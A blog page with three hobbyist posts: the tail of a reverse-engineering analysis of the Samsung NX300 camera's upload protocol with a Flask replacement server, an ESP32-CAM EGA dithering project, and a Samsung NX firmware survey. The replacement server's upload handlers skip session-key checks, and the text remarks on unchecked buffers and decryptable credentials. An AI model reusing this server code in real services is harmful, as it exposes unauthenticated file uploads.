        char *crypt_key = sha1str(header_for_sig);
        body = WebMalloc(2048);
        WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
        WebString_Add_fmt(body,"%s%s%s%s%s",
                "<Request Method=\"upload\" Timeout=\"3000\" SessionKey=\"",
                gWeb.response_session_key,"\" CryptKey=\"",crypt_key,"\">\r\n");
        WebString_Add_fmt(body,"%s%s","<Photo>","\r\n");
        if (site_idx == /*1*/ SITE_FACEBOOK) {
            char *folder = xml_escape(gWeb.facebook_folder);
            WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"",folder,"\"/>\r\n");
        } else
            WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"","Samsung Smart Camera","\"/>\r\n");
        WebString_Add_fmt(body,"%s%s%s%s","<File Name=\"",gWeb.file_name,"\"/>","\r\n")
        if (site_idx != /*9*/ SITE_WEIBO) {
            WebString_Add_fmt(body,"%s%s%s%s","<Content><![CDATA[",gWeb.description,"]\]></Content>","\r\n");
        }
        WebString_Add_fmt(body,"%s%s","</Photo>","\r\n");
        WebString_Add_fmt(body,"%s%s","</Request>","\r\n");

        body_len = strlen(body);
        WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/photo HTTP/1.1","\r\n");
        WebString_Add_fmt(header,"%s%s%s","Host: ",hostname,"\r\n");
        WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
        WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
        WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
        strcat(header,body);
        strcpy(out_http_request,header);
        return true;
    }
    if (strstr(gWeb.file_path, "MP4") != NULL) {
        /* analogous to picture upload, but for video */
    } else
        return false; /* wrong file type */
}

bool WebOperateMetaDataUpload(int site_idx,int sock_idx,char *buf) {
    /* snip hostname selection similar to WebMakeLoginData */
    bool result = WebSocketConnect(sock_idx,hostname,80);
    if (result) {
        SendTCPSocket(sock_idx,buf,strlen(buf),0,false,0,0);
        response = malloc(2048);
        ReceiveTCPProcess(sock_idx,response,300);
        return WebCheckRequest(response);
    }
    return false;
}

The generated XML looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<Request Method="upload" Timeout="3000" SessionKey="deadbeef" CryptKey="4f69e3590858b5026508b241612a140e2e60042b">
<Photo>
<Album ID="" Name="Samsung Smart Camera"/>
<File Name="SAM_9838.JPG"/>
<Content><![CDATA[Upload test message.]]></Content>
</Photo>
</Request>

Upload response: WebCheckRequest()

The server response is checked by WebCheckRequest():

bool WebCheckRequest(char *xml) {
    /* check for HTTP 200 OK, populate ErrCode and ErrSubCode on error */
    if (!GetXmlResult(xml))
        return false;
    memset(web->HostAddr,0,64); /* 64 byte buffer */
    memset(web->ResourceID,0,128); /* 128 byte buffer */
    GetXmlString(xml,"HostAddr",web->HostAddr);
    GetXmlString(xml,"ResourceID",web->ResourceID);
    return true;
}

Thus the server needs to return an (arbitrary) XML element that has the two attributes HostAddr and ResourceID, which are stored in the gWeb struct for later use. As always, there are no range checks (but those fields are in the middle of the struct, so maybe not the best place to smash.

Actual media upload: WebOperateUpload()

The code is pretty straight-forward, it creates a buffer with the (downscaled or original) media file, makes a HTTP PUT request to the host and resource obtained earlier, and submits that to the server:

bool WebOperateUpload(int sock_idx,ulong picType) {
    char hostname[128];
    memset(hostname,0,128);
    WebParseIP(gWeb.HostAddr,hostname); /* not required to be an IP */
    int port = WebParsePort(web->HostAddr);
    if (!WebSocketConnect(sock_idx,hostname,port))
        return false;
    char *file_buffer;
    int file_size;
    char *request = WebMalloc(2048);
    WebMakeUploadingData(request,&file_buffer_ptr,&file_size,picType);
    if (WebUploadingData(sock_idx,request,file_buffer_ptr,file_size)) {
        if (strstr(gWeb.file_path,"JPG") || strstr(gWeb.file_path, "MP4"))
            WebFree(file_buffer_ptr);
        WebSocketClose(sock_idx);
    }
}

bool WebMakeUploadingData(char *out_http_request,char **file_buffer_ptr,int *file_size_ptr,ulong picType) {
    request = WebMalloc(512);
    if (strstr(gWeb.file_path,"JPG")) {
        /* scale down or send original image */
        if (picType == 0) {
            int megapixels = 2;
            if (strcmp(gWeb.site, "facebook") == 0)
                megapixels = 1;
            NASLWifi_jpegResizeInMemory(gWeb.file_path,megapixels,file_buffer_ptr,file_size_ptr);
        } else
            NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
    } else if (strstr(gWeb.file_path,"MP4")) {
        NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
    }
    WebString_Add_fmt(request,"%s%s%s%s","PUT /",gWeb.ResourceID," HTTP/1.1","\r\n");
    if (strstr(gWeb.file_path,"JPG")) {
        WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
    } else if (strstr(gWeb.file_path,"MP4")) {
        /* copy-paste-fail? should be video... */
        WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
    }
    WebString_Add_fmt(request,"%s%d%s","Content-Length: ",*file_size_ptr,"\r\n");
    WebString_Add_fmt(request,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
    WebString_Add_fmt(request,"%s%d/%d%s","Content-Range: bytes 0-",*file_size_ptr - 1,
            *file_size_ptr,"\r\n");
    WebString_Add_fmt(request,"%s%s%s","Host: ",gWeb.HostAddr,"\r\n\r\n");
    strcpy(out_http_request,request);
}

The actual upload function WebUploadingData() is operating in a straight-forward way, it will send the request buffer and the file buffer, and check for a HTTP 200 OK response or for the presence of ErrCode and ErrSubCode.

Writing an upload handler

We need to implement a /<site>/photo handler that returns an (arbitrary) upload path and a PUT handler that will process files on that path.

The upload path will be served using this XML (the hostname is hardcoded because we already had to hijack the snsgw hostname anyway):

<Response HostAddr="snsgw.samsungmobile.com:80" ResourceID="upload/{{ sessionkey }}/{{ filename }}" />

Then we have the two API endpoints:

@app.route('/<string:site>/photo',methods = ['POST'])
def photo(site):
    xml = ET.fromstring(request.get_data())
    # TODO: check session key
    sessionkey = xml.attrib["SessionKey"]
    photo = xml.find("Photo")
    filename = photo.find("File").attrib["Name"]
    # we just pass the sessionkey into the upload URL
    return render_template('response-upload.xml', sessionkey, filename)

@app.route('/upload/<string:sessionkey>/<string:filename>', methods = ['PUT'])
def upload(sessionkey, filename):
    d = request.get_data()
    # TODO: check session key
    store = os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(sessionkey))
    os.makedirs(store, exist_ok = True)
    fn = os.path.join(store, secure_filename(filename))
    with open(fn, "wb") as f:
        f.write(d)
    return "Success!"

Conclusion

Samsung implemented this service back in 2009, when mandatory SSL (or TLS) wasn't a thing yet. They showed intent of properly securing users' credentials by applying state-of-the-art symmetric and asymmetric encryption instead. However, the insecure (commented out?) random key generation algorithm was not suitable for the task, and even if it were, the secret key was provided as part of the message anyway. A passive attacker listening on the traffic between Samsung cameras and their API servers was able to obtain the AES key and thus decrypt the user credentials.

In this post, we have analyzed the client-side code of the NX300 camera, and re-created the APIs as part of the samsung-nx-emailservice project.


Comments on HN

Posted 2023-12-01 17:02 Tags:

This post is about shooting 16-color EGA (1984) styled retro photos right on the 4$ ESP32-CAM board and storing them to µSD in the arcane TGA (1984) file format.

For that, we need to read RGB images, convert them to 16 colors, apply dithering, and store a TGA image file.

ESP32-EGA16-TGA source code on GitHub.

Test-photo Bayer-dithered to EGA colors, with shifted matrices

Introduction

This year's Shitty Camera Challenge has some space for digital cameras, and so the author experimented with different devices. The last one, the ESP32-CAM, was obtained after the HomeAssistant setup wizard promised an easy way to monitor analog utility meters with camera and AI, and what could be shittier than a 4$ camera PCB?

ESP32-CAM

The ESP32-CAM turned out to be even shittier than anticipated. Of the four sensors ordered, three had visible defects. The image quality is green. The board pinout is ridiculous, with the LED flash wired to the SD data line, the PCB LED blocking WiFi, and no fully usable GPIOs.

Still, the ESP32 is quite a beefy beast for an embedded SoC, with a 240MHz 32-bit core and ~500KB of SRAM on die, plus some 4MB of PSRAM on the board to store camera pictures. The pictures can be streamed over WiFi or stored to a µSD card, giving us some flexibility.

The CPU and memory specs are far beyond 1980s desktop computers, so we are not limited in the choice of algorithms to perform our task, and we can easily cheat where needed.

The platform is supported by Arduino IDE and by PlatformIO, typically programmed in C/C++, and there are example projects to implement a webcam or to take pictures to µSD.

Reading RGB data from the sensor into memory

The camera API supports various streaming formats, from pre-compressed JPEG to RAW:

typedef enum {
    PIXFORMAT_RGB565,    // 2BPP/RGB565
    PIXFORMAT_YUV422,    // 2BPP/YUV422
    PIXFORMAT_YUV420,    // 1.5BPP/YUV420
    PIXFORMAT_GRAYSCALE, // 1BPP/GRAYSCALE
    PIXFORMAT_JPEG,      // JPEG/COMPRESSED
    PIXFORMAT_RGB888,    // 3BPP/RGB888
    PIXFORMAT_RAW,       // RAW
    PIXFORMAT_RGB444,    // 3BP2P/RGB444
    PIXFORMAT_RGB555,    // 3BP2P/RGB555
} pixformat_t;

The easiest format for us to process is RGB888, with one byte for each of the three colors, stored in a two-dimensional pixel array. Except when the API is a lie:

E (1195) esp32 ll_cam: Requested format is not supported

Luckily, the github-actions bot closed the issue as completed, so it's solved, right? RIGHT??? The error message comes from ll_cam_set_sample_mode() and its source code reveals that the actually implemented options are:

  • PIXFORMAT_GRAYSCALE
  • PIXFORMAT_YUV422
  • PIXFORMAT_JPEG
  • PIXFORMAT_RGB565

Greyscale gives us one brightness byte per pixel, but we want to have colors. YUV422 stores two pixels in four bytes and requires a color space conversion. JPEG requires that as well, but only after parsing and uncompressing the JPEG file. RGB565 stores one pixel in two bytes, with five bits for red and blue, respectively, and six bits for green. That gives us enough headroom to do some dithering for a 16-color palette and spares us from non-linear luminance and chrominance formulas.

Furthermore, RGB565 can be converted to RGB888 with just a bit of bit shifting, so there we go. We configure the camera to take images in QVGA (320x240, close enough to the EGA 320x200 original) into PSRAM:

camera_config_t config;
/* ... snip boilerplate ... */
config.pixel_format = PIXFORMAT_RGB565;
config.frame_size = FRAMESIZE_QVGA;
config.fb_location = CAMERA_FB_IN_PSRAM;
esp_camera_init(&config);

However, after firing up the image sensor and taking a shot, we realize that everything is green. Not monochrome green, but bad-white-balance green. The suggested workaround is to give the camera some time to calibrate after enabling auto white balance, by taking and discarding a few shots:

sensor_t *s = esp_camera_sensor_get();
/* Enable AWB and AWB gain in auto mode */
s->set_whitebal(s, 1);
s->set_awb_gain(s, 1);
s->set_wb_mode(s, 0);
/* DO NOT DO COPY THIS! Set contrast and saturation to max for the EGA effect */
s->set_contrast(s, 2);
s->set_saturation(s, 2);
/* Take and discard a few pictures */
for (int i= 0 ; i < WARMUP_PICS; i++) {
  camera_fb_t *fb = esp_camera_fb_get();
  if (fb)
    esp_camera_fb_return(fb);
}

After that (with WARMUP_PICS=10), the image is less green. Not quite true-color, but acceptable. The raw RGB565 image bytes (320*240*2 = 153600 of them) can be found in fb->buf:

Test photo in RGB565 colors

As noted above, the image is 320*240 and not 320*200, as the EGA card didn't have square pixels. We can compensate that by just skipping one of each six rows when converting. Then we just can fix the aspect ratio in post-production for modern PC displays, by scaling up to 200%x240%.

Interlude: viewing RGB565 images

An obvious intermediate step when developing a camera application is storing the "raw" or "intermediate" pixel arrays right to "disk", i.e. the µSD card.

RGB888 images can be trivially converted (and scaled up for modern displays) by ImageMagick, the author's favorite image processing CLI:

convert -depth 8 -size 320x240 input.rgb -scale 200% output.png

There is no direct driver for RGB565, but there is this RGB565 parser pattern and it leaves the author speechless. WTF. ImageMagick is the Swiss army knife of image processing, but is this Turing complete?!?

So maybe the second favorite image processing tool has something in the pipeline? Oh yes indeed:

ffmpeg -vcodec rawvideo -f rawvideo -pix_fmt rgb565be -s 320x240 -i input.rgb565 -f image2 -vcodec png output.png

Et voila! We can store intermediate pictures, test individual phases of the pipeline and see where things go wrong. The ESP32 µSD interface is quite slow, so storing the "huge" 150KiB and 225KiB images takes a second or so of intensive flash LED blinking. And that LED gets rather hot, so watch out for your fingers!

EGA 16-color palette

The EGA color palette was a natural choice for this experiment, because its 16 colors are well known and still in use today in terminal mode applications (including most things you can access through SSH), and while they don't go back to roman horse asses or 1920's punch cards, they were created by IBM in 1981 for the IBM CGA adapter based on a simple one bit per color plus one intensity bit scheme, and an analog hardware hack to replace the ugly yellow ocher with a slightly less unpleasant brown.

The result are the following natural colors beloved by retro pixel artists, perfectly suited for photography:

0 #000000 1 #0000AA 2 #00AA00 3 #00AAAA 4 #AA0000 5 #AA00AA 6 #AA5500 7 #AAAAAA
8 #555555 9 #5555FF 10 #55FF55 11 #55FFFF 12 #FF5555 13 #FF55FF 14 #FFFF55 15 #FFFFFF

Technically, the full EGA color palette has two bits per color, resulting in 64 total colors, but you can only ever choose 16 of them, and as the defaults are well-known, we are sticking to them.

To provide the best resulting image quality, for each pixel we will pick the closest EGA color, by minimizing the Euclidean distance in three-dimensional space, or in different words, we'll calculate the squared differences for each color channel and pick the smallest one:

for (int i = 0; i < 16; i++) {
  int delta_r = abs(EGA_PALETTE[i][0]-r);
  int delta_g = abs(EGA_PALETTE[i][1]-g);
  int delta_b = abs(EGA_PALETTE[i][2]-b);
  int match = delta_r*delta_r + delta_g*delta_g + delta_b*delta_b;
  if (match < best_match) {
      best_match = match;
      best_color = i;
  }
}

We could implement a fancy look-up-table for each of the 65536 possible RGB565 values, but we have plenty of CPU cycles and not so much RAM, and only 64000 pixels, so we just do the look-up for each of them.

Test-photo mapped directly to EGA colors

The results look surprisingly monochrome, with just a few colored areas. It turns out that the low saturation of the ESP camera sensor maps most real-world motives onto the four shades of grey when using the "closest color" approach. To increase the saturation, we'd have to convert our pixels into another colorspace, so let's look for a different approach.

Dithering of photos to 16 colors

The standard (old-school) technique to map natural colors to a limited palette is color dithering. There are different algorithms, with different trade-offs, resulting in different image quality.

The simplest one, average dithering, assigns the closest palette color to each pixel, and we've seen it in action above.

Floyd-Steinberg from 1975 is the most sophisticated one, giving the most natural results and having a nice natural and irregular pixel distribution. It works by taking the error (difference between the original color and the mapped palette color) of each pixel, and spreading ("propagating") that error out to the neighbor pixels below and to the right. This creates a statistical distribution of colored pixels proportional to the level of the respective color in the image. The algorithm is clever by only applying the propagation to pixels right and below of the current one, allowing to process an image in a single linear pass.

However, it means that we need to change pixel values one row ahead in our buffer, and adding something to a pixel's color might overflow it, so we need to clip values to the (0, 31) or (0, 63) range. However, we can get a very good approximation by only propagating the error to the next pixel in the current row, with much less work:

Test-photo error-dithered to EGA colors

There are slightly noticeable vertical line artifacts at the left edge, as we reset the error variables at the beginning of the column (otherwise, colors from the right edge would "bleed over"), that wouldn't be there with the two-dimensional approach of Floyd-Steinberg. Beyond that, this is already too good and almost too true-color to really count as a shitty image.

There is one approach that was easier to implement on 1980s hardware (and that allowed better compression of the images), and that is ordered (or Bayes) dithering. It's using a (most often square) threshold table that is applied repeatedly to the image, changing the respective colors and resulting in a visible cross-hatch pattern.

By simply taking a bayer pattern table from StackOverflow, and doubling the threshold values to compensate for the pale camera colors, we get this:

Test-photo Bayer-dithered to EGA colors

Now why is this so monochrome again? Well, the Bayer pattern is applied individually to each of the three color channels, and we are using the same pattern position for the three channels of a pixel, so effectively we always apply a greyscale threshold. By simply shifting the pattern one pixel to the right for green and one pixel down for blue, we get a much better result:

Test-photo Bayer-dithered to EGA colors, with shifted matrices

Perfect! That's exactly the desired image quality to compete in the Shitty Camera Challenge!

Saving as TGA

Actually, TGA wasn't the first choice format for this project. The author's favorite is PCX (1985), which is only slightly younger than TGA, but was supported by the author's favorite image editing tool, that also featured the most creative versioning scheme: Deluxe Paint II Enhanced 2.0.

However, the author's favorite image viewer, Geeqie, fails to properly display PCX files, and fixing that was way out-of-scope for this project, or so the author thought. So we stick to TGA, which seems to be properly supported based on throwing a few test files at it.

The file format is simple when compression is disabled, coming with a small 18-byte header followed by the palette (in BGR order, not RGB), and then the packed raw pixel data, from bottom to top.

Well. In theory, TGA supports various color depths and palette types from 1 bit per pixel to RGBA. What we have is a 16-color 4bpp (4 bits per pixels; not to be confused with the "BPP" bytes-per-pixel used in the ESP32 headers) image with a 16*3 byte palette. However, the image processing tools that claim to "support" TGA don't actually accept arbitrary variants.

Screenshot of a GIMP error message not accepting my TarGA format

So we have to artificially inflate our pixel data from 4bpp to 8bpp, and because the tools will also ignore the "number of colors in the palette" field and instead use the "number of colors in the image" field, we need to store a full 256-color palette in the file, of which we will only use the first 16 entries:

memcpy(tga, &header, sizeof(TgaHeader));
for (int i = 0; i < STORE_COLORS; i++) {
  tga[sizeof(TgaHeader) + i*3 + 0] = EGA_PALETTE[i % COLORS][2];
  tga[sizeof(TgaHeader) + i*3 + 1] = EGA_PALETTE[i % COLORS][1];
  tga[sizeof(TgaHeader) + i*3 + 2] = EGA_PALETTE[i % COLORS][0];
}
for (y = 0; y < HEIGHT; y++) {
  src_pos = y*WIDTH;
  dst_pos = (HEIGHT - y - 1)*WIDTH;
  memcpy(tga + sizeof(TgaHeader) + 3*256 + dst_pos, framebuffer + src_pos, WIDTH);
}

The remaining code of the project is based on existing examples. Find the full ESP32-EGA16-TGA source code on GitHub. Beware, it's as shitty as everything shown above, to fit into the project. This is not production-quality C code.

Comments on HN

Posted 2023-08-04 18:07 Tags:

Many years ago, in the summer of 2014, I fell into the rabbit hole of the Samsung NX(300) mirrorless APS-C camera, found out it runs Tizen Linux, analyzed its WiFi connection, got a root shell and looked at adding features.

Next year, Samsung "quickly adapted to market demands" and abandoned the whole NX ecosystem, but I'm still an active user of the NX500 and the NX mini (for infrared photography). A few months ago, I was triggered to find out which respective framework is powering which of the 19(!!!) NX models that Samsung released between 2010 and 2015. The TL;DR results are documented in the Samsung NX model table, and this post contains more than you ever wanted to know, unless you are a Samsung camera engineer.

Hardware Overview

There is a Wikipedia list of all the released NX models that I took as my starting point. The main product line is centered around the NX mount, and the cameras have a "NXnnnn" numbering scheme, with "nnnn" being a number between one and four digits.

In addition, there is the Galaxy NX, which is an Android phone, but also has the NX mount and a DRIM engine DSP. This fascinating half-smartphone half-camera line began in 2012 with the Galaxy Camera and featured a few Android models with zoom lenses and different camera DSPs.

In 2014, Samsung introduced the NX mini with a 1" sensor and the "NX-M" lens mount, sharing much of the architecture with the larger NX models. In 2015, they announced accidentally leaked the NX mini 2, based on the DRIMeV SoC and running Linux, and even submitted it to the FCC, but it never materialized on the market after Samsung "shifted priorities". If you are the janitor in Samsung's R&D offices, and you know where all the NX mini 2 prototypes are locked up, or if you were involved in making them, I'd die to get my hands onto one of them!

Most of the NX cameras are built around different generations of the "DRIM engine" image processor, so it's worth looking at that as well.

The Ukrainian company photo-parts has a rather extensive list of NX model boards, even featuring a few well-made PCB photographs. While their page is quirky, the documentation is excellent and matches my findings. They have documented the DRIMe CPU generation for many, but not for all, NX cameras.

Origins of the DRIM engine

Samsung NV100 (*)

Apparently the first cameras introducing the DRIM engine ("Digital Real Image & Movie Engine") were the NV30/NV40 in 2008. Going through the service manuals of the NV cameras reveals the following:

  • NV30 (the Samsung camera, not the Samsung laptop with the same model number): using the Milbeaut MB91686 image processor introduced in 2006
  • NV40: also using the MB91686
  • NV24: "TWE (MB91043)"
  • NV100 (also called TL34HD in some regions): "DRIM II (MB91043)"

There are also some WB* camera models built around Milbeaut SoCs:

  • WB200, WB250F, WB30F, WB800F: MB91696 (the SoC has "MB91696B" on it, the service manual claims "MB91696AM / M6M2-J"), firmware strings confirm "M6M2J"

This looks like the DRIM engine is a re-branded Milbeaut MB91686, and the DRIM engine II is a MB91043. Unfortunately, nothing public is known about the latter, and it doesn't look like anybody ever talked about this processor model.

Even more unfortunately, I wasn't able to find a (still working) firmware download for any of those cameras.

Firmware Downloads

Luckily, the firmware situation is better for the NX cameras. To find out more about each of them, I visited the respective Samsung support page and downloaded the latest firmware release. For the Android-based cameras however, firmware images are only available through shady "Samsung fan club" sites.

The first classification was provided by the firmware size, as there were distinct buckets. The first generation, NX5, NX10, and NX11 had (unzipped) sizes of ~15MB, the last generation NX1 and NX500 were beyond 350MB.

Googling for respective NX and "DRIM engine" press releases, PCB photos and other related materials helped identifying the specific generation. Sometimes, there were no press releases mentioning the SoC and I had to resort to PCB photos found online or made by myself or other NX enthusiasts.

Further information was obtained by checking the firmware files with strings and binwalk, with the details documented below.

Note: most firmware files contain debug strings and file paths, often mentioning the account name of the respective developer. Personal names of Samsung developers are masked out in this blog post to protect the guilty innocent.

Mirrorless Cameras

DRIMeII: NX10, NX5, NX11, NX100

Samsung NX10 (*)

The first NX camera released by Samsung was the NX10, so let's look into its firmware. The ZIP contains an nx10.bin, and running that through strings -n 20 still yields some 11K unique entries.

There are no matches for "DRIM", but searching for "version", "revision", and "copyright" yields a few red herrings:

* Powered by [redacted] in DSLR team *
* This version apadpter for NX10 (16MB NOR) *
* Ice Updater v 0.025 (Base on FW Updater) *
* Hermes Firmware Version 0.00.001 (hit Enter for debugger prompt)       *
*                COPYRIGHT(c) 2008 SYRI                                  *

It's barely possible to find out the details of those names after over a decade, and we still don't know which OS is powering the CPU.

One hint is provided by the source code reference in the binary: D:\070628_view\NX10_DEV_MAIN\DSLR_PRODUCT\DSP\Project\CSP\..\..\Source\System\CSP\CSP_1.1_Gender\CSP_1.1\uITRON\Include\PCAlarm.h

This seems to be based on a "CSP", and feature "uITRON". The former might be the Samsung Core Software Platform, as identified by the following copyright notice in the firmware file:

Copyright (C) SAMSUNG Electronics Co.,Ltd.
SAMSUNG (R) Core SW Platform 2.0 for CSP 1.1

The latter is µITRON, a Japanese real-time OS specification going back to 1984. So let's assume the first camera generation (everything released in 2010) is powered by µITRON, as NX5, NX10 and NX11 have the same strings in their firmware files.

Samsung NX100 (*)

The NX100 is very similar to the above devices, but its firmware is roughly twice the size, given that it has a 32MB NOR flash (according to the bootloader strings). However, there are only 19MB of non-0x00, non-0xff data, and from comparing the extracted strings no significant new modules could be identified.

None of them identify the DRIM engine generation, but the NX10 service manual labels the CPU as "DSP (DRIMeII Pro)", so probably related to but slightly better than NV100's "DRIM II MB91043". Furthermore, all of these models are documented as "DRIM II" by photo-parts, and there is a well-readable PCB shot of the NX100 saying "DRIM engine IIP".

DRIMeIII: NX200, NX20, NX210, NX1000, NX1100

Samsung NX200 (*)

One year later, in 2011, Samsung released the NX200 powered by DRIM (engine) III. It is followed in 2012 by NX20, NX210, and NX1000/NX1100 (the only difference between the last two is a bundled Adobe Lightroom). The NX20 emphasizes professionalism, and the NX1x00 and NX2x0 stand for compact mobility.

The NX200 firmware also makes a significant leap to 77MB uncompressed, and the following models clock in at around 102MB uncompressed.

Each of the firwmare ZIPs contains two files respectively, named after the model, e.g. nx200.Rom and nx200.bin. Binwalking the Rom doesn't yield anything of value, except roughly a dozen of artistic collage background pictures. strings confirms that it is some sort of filesystem not identified by binwalk (and it contains a classical music compilation, with tracks titled "01_Flohwalzer.mp3" to "20_Spring.mp3", each roughly a minute long, sounding like ringtones from the 2000s)! The pictures and music files can be extracted using PhotoRec.

The bin binwalk yields a few interesting strings though:

8738896       0x855850        Unix path: /opt/windRiver6.6/vxworks-6.6/target/config/comps/src/edrStub.c
...
10172580      0x9B38A4        Copyright string: "Copyright (C) 2011, Arcsoft Inc."
10275754      0x9CCBAA        Copyright string: "Copyright (c) 2000-2009 by FotoNation. All rights reserved."
10485554      0x9FFF32        Copyright string: "Copyright Wind River Systems, Inc., 1984-2007"
10495200      0xA024E0        VxWorks WIND kernel version "2.11"

So we have identified the OS as Wind River's VwWorks.

A strings inspection of the bin also gives us "ARM DRIMeIII - ARM926E (ARM)" and "DRIMeIII H.264/AVC Encoder", confirming the SoC generation, weird network stuff ("ftp password (pw) (blank = use rsh)"), and even some fancy ASCII art:

]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
     ]]]]]]]]]]]  ]]]]     ]]]]]]]]]]       ]]              ]]]]         (R)
]     ]]]]]]]]]  ]]]]]]     ]]]]]]]]       ]]               ]]]]            
]]     ]]]]]]]  ]]]]]]]]     ]]]]]] ]     ]]                ]]]]            
]]]     ]]]]] ]    ]]]  ]     ]]]] ]]]   ]]]]]]]]]  ]]]] ]] ]]]]  ]]   ]]]]]
]]]]     ]]]  ]]    ]  ]]]     ]] ]]]]] ]]]]]]   ]] ]]]]]]] ]]]] ]]   ]]]]  
]]]]]     ]  ]]]]     ]]]]]      ]]]]]]]] ]]]]   ]] ]]]]    ]]]]]]]    ]]]] 
]]]]]]      ]]]]]     ]]]]]]    ]  ]]]]]  ]]]]   ]] ]]]]    ]]]]]]]]    ]]]]
]]]]]]]    ]]]]]  ]    ]]]]]]  ]    ]]]   ]]]]   ]] ]]]]    ]]]] ]]]]    ]]]]
]]]]]]]]  ]]]]]  ]]]    ]]]]]]]      ]     ]]]]]]]  ]]]]    ]]]]  ]]]] ]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]       Development System
]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]       
]]]]]]]]]]]]]]]]]]]]]]]]]]       KERNEL: 
]]]]]]]]]]]]]]]]]]]]]]]]]       Copyright Wind River Systems, Inc., 1984-2007

The 2012 models (NX20, NX210, NX1000, NX1100) contain the same copyright and CPU identification strings after a cursory look, confirming the same info about the third DRIMe generation.

Side note: there is also a compact camera from early 2010, the WB2000/TL350 (EU/US name), also built around the DRIMeIII and also running VxWorks. It looks like it was developed in parallel to the DRIMeII based NX10!

Another camera based on DRIMeIII and VxWorks is the EX2F from 2012.

DRIMeIV, Tizen Linux: NX300(M), NX310, NX2000, NX30

Samsung NX300 (*)

In early 2013, Samsung gave a CES press conference announcing the DRIMe IV based NX300. Linux was not mentioned, but we got a novelty single-lens 3D feature and an AMOLED screen. Samsung also published a design overview of the NX300 evolution.

I've looked into the NX300 root filesystem back in 2014, and the CPU generation was also confirmed from /proc/cpuinfo:

Hardware    : Samsung-DRIMeIV-NX300

The NX310 is just an NX300 with additional bundled gimmicks, sharing the same firmware. The actual successor to the NX300 is the NX2000, featuring a large AMOLED and almost no physical buttons (why would anybody buy a camera without knobs and dials?). It's followed by the NX300M (a variant of the NX300 with a 180° tilting screen), and the NX30 (released 2014, a larger variant with eVF and built-in flash).

All of them have similarly sized and named firmware (nx300.bin), and the respective OSS downloads feature a TIZEN folder. All are running Linux kernel 3.5.0. There is a nice description of the firmware file structure by Douglas J. Hickok. The bin files begin with SLP\x00, probably for "Samsung Linux Platform", and thus I documented them as SLP Firmware Format and created an SLP firmware dumper.

Fujitsu M7MU: NX mini, NX3000, NX3300

Samsung NX mini (*)

In the first half of 2014, the NX mini was announced. It also features WiFi and NFC, and with its NX-M mount it is one of the smallest digital interchangeable-lens cameras out there! The editor notes reveal that it's based on the "M7MU" DSP, which unfortunately is impossible to google for.

The firmware archive contains a file called DATANXmini.bin (which is not the SLP format and also a break with the old-school 8.3 filename convention), and it seems to use some sort of data compression, as most strings are garbled after 16 bytes or earlier (C:\colomia\Gui^@^@Lib\Sources\Core^@^PAllocator.H, here using Vim's binary escape notation).

There are a few string matches for "M7MU", but nothing that would reveal details about its manufacturer or operating system. The (garbled) copyright strings give a mixed picture, with mentions of:

Copyright (c) 2<80>^@^@5-2011, Jouni Ma^@^@linen <*@**.**>
^@^@and contributors^@^B^@This program ^@^Kf^@^@ree software. Yo!
u ^@q dis^C4e it^AF/^@<9c>m^D^@odify^@^Q
under theA^@ P+ms of^B^MGNU Gene^A^@ral Pub^@<bc> License^D^E versPy 2.

Samsung NX3000 (*)

This doesn't give us any hints on what is powering this nice curiosity of ILC. The few PCB photos available on the internet have the CPU covered with a sticker, so no dice there either. All of the above similarly applies to the NX3000, which is running very similar code but has the larger NX mount, and the NX3300, which is a slightly modified NX3000 with more selfie shooting and less Adobe Lightroom.

It took me quite a while of fruitless guessing, until I was able to obtain a (broken) NX3000 and disassemble it, just to remove the CPU sticker.

The sticker revealed that the CPU is actually an "MB86S22A", another Fujitsu Milbeaut Image Processor, with M-7M being the seventh generation (not sure about "MU", but there is "MO" for mobile devices), built around the ARM Cortex-A5MP core!

Github code search reveals that there is actually an M7MU driver in the forked Exynos Linux kernel, and it defines the firmware header structure. Let's hack together a header reader in python real quick now, and run that over the NX mini firmware:

Header Value
block_size 0x400 (1024)
writer_load_size 0x4fc00 (326656)
write_code_entry 0x40000400 (1073742848)
sdram_param_size 0x90 (144)
nand_param_size 0xe1 (225)
sdram_data *stripped 144 bytes*
nand_data *stripped 225 bytes*
code_size 0xafee12 (11529746)
offset_code 0x50000 (327680)
version1 "01.10"
log "201501162119"
version2 "GLUAOA2"
model "NXMINI"
section_info 00000007 00000001
0050e66c 00000002
001a5985 00000003
00000010 00000004
00061d14 00000005
003e89d6 00000006
00000010 00000007
00000010 00000000
9x 00000000
pdr ""
ddr 00 b3 3f db 26 02 08 00 d7 31 08 29 01 80 00 7c 8c 07
epcr 00 00 3c db 00 00 08 30 26 00 f8 38 00 00 00 3c 0c 07

That was less than informative. At least it's a good hint for loading the firmware into a decompiler, if anybody gets interested enough.

But why should the Linux kernel have a module to talk to an M7MU? One of the kernel trees containing that code is called kernel_samsung_exynos5260 and the Exynos 5260 is the SoC powering the Galaxy K Zoom. So the K Zoom does have a regular Exynos SoC running Android, and a second Milbeaut SoC running the image processing. Let's postpone this Android hybrid for now.

DRIMeV, Tizen Linux: NX1, NX500, Gear360

Samsung NX1 (*)

